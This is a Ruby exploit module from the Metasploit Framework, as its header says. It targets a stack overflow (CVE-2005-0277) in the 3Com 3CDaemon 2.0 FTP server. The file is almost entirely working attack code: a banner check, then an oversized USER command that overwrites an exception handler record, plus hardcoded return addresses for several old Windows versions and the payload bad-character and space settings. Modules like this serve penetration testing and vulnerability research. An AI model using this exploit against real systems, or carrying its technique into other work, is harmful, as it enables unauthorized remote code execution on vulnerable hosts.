
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
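# 3Com 3CDaemon 2.0 FTP "USER" stack overflow (CVE-2005-0277).
#
# The module connects to the FTP service, sends an oversized USER argument
# that overwrites a structured exception handler record, and lets the Seh
# mixin's generated record redirect execution into the payload. Targets are
# pre-ASLR Windows releases, so the per-target 'Ret' is a fixed address of a
# pop/pop/ret sequence in a system DLL.
class Metasploit3 < Msf::Exploit::Remote
        Rank = AverageRanking

        include Msf::Exploit::Remote::Ftp
        include Msf::Exploit::Remote::Seh

        # Total length of the USER argument sent to the service.
        USER_BUFFER_LENGTH = 2048

        # Offset into the USER argument at which the SEH record is written.
        # The same offset is used for every listed target.
        SEH_OFFSET = 229

        def initialize(info = {})
                super(update_info(info,
                        'Name'           => '3Com 3CDaemon 2.0 FTP Username Overflow',
                        'Description'    => %q{
                                        This module exploits a vulnerability in the 3Com 3CDaemon
                                FTP service. This package is being distributed from the 3Com
                                web site and is recommended in numerous support documents.
                                This module uses the USER command to trigger the overflow.
                        },
                        'Author'         => [ 'hdm' ],
                        'License'        => MSF_LICENSE,
                        'Version'        => '$Revision$',
                        'References'     =>
                                [
                                        [ 'CVE', '2005-0277'],
                                        [ 'OSVDB', '12810'],
                                        [ 'OSVDB', '12811'],
                                        [ 'BID', '12155'],
                                        [ 'URL', 'ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip'],
                                ],
                        'Privileged'     => false,
                        'Payload'        =>
                                {
                                        # Usable payload space after the SEH record is placed at SEH_OFFSET.
                                        'Space'    => 674,
                                        # Bytes the FTP command parser mangles or terminates on
                                        # (NUL, whitespace, CR/LF, path separators, and a few
                                        # punctuation characters) -- excluded from the payload
                                        # and from the random filler.
                                        'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x09",
                                        'StackAdjustment' => -3500,
                                        'Compat'   =>
                                                {
                                                        'ConnectionType' => "-find"
                                                }
                                },
                        'Targets'        =>
                                [
                                        [
                                                'Windows 2000 English', # Tested OK - hdm 11/24/2005
                                                {
                                                        'Platform' => 'win',
                                                        'Ret'      => 0x75022ac4, # ws2help.dll
                                                },
                                        ],
                                        [
                                                'Windows XP English SP0/SP1',
                                                {
                                                        'Platform' => 'win',
                                                        'Ret'      => 0x71aa32ad, # ws2help.dll
                                                },
                                        ],
                                        [
                                                'Windows NT 4.0 SP4/SP5/SP6',
                                                {
                                                        'Platform' => 'win',
                                                        'Ret'      => 0x77681799, # ws2help.dll
                                                },
                                        ],
                                        [
                                                'Windows 2000 Pro SP4 French',
                                                {
                                                        'Platform' => 'win',
                                                        # NOTE(review): the source DLL for this address was not
                                                        # recorded; confirm against the target's loaded modules
                                                        # before relying on it.
                                                        'Ret' => 0x775F29D0,
                                                },
                                        ],

                                ],
                        'DisclosureDate' => 'Jan 4 2005'))
        end

        # Fingerprint the service from its FTP greeting.
        #
        # The banner is captured by the Ftp mixin during connect, so the
        # connection can be closed before it is inspected.
        #
        # Returns CheckCode::Vulnerable when the greeting names 3CDaemon FTP
        # 2.0, CheckCode::Unknown when no greeting was received at all (a
        # silent or filtered service is not evidence of safety), and
        # CheckCode::Safe for any other greeting.
        def check
                connect
                disconnect

                greeting = banner.to_s
                return Exploit::CheckCode::Unknown if greeting.empty?
                return Exploit::CheckCode::Vulnerable if greeting =~ /3Com 3CDaemon FTP Server Version 2\.0/

                Exploit::CheckCode::Safe
        end

        # Deliver the overflow via a single USER command.
        #
        # The argument is USER_BUFFER_LENGTH bytes of random English text
        # filtered through the payload's bad characters; the SEH record built
        # by generate_seh_payload (next-SEH pointer, handler address from
        # target.ret, and the payload) is written in place at SEH_OFFSET.
        def exploit
                connect

                print_status("Trying target #{target.name}...")

                buf = rand_text_english(USER_BUFFER_LENGTH, payload_badchars)
                seh = generate_seh_payload(target.ret)
                buf[SEH_OFFSET, seh.length] = seh

                # The second argument asks the Ftp mixin not to read a reply;
                # presumably the service never answers once the handler record
                # has been overwritten.
                send_cmd( ['USER', buf] , false )

                handler
                disconnect
        end

end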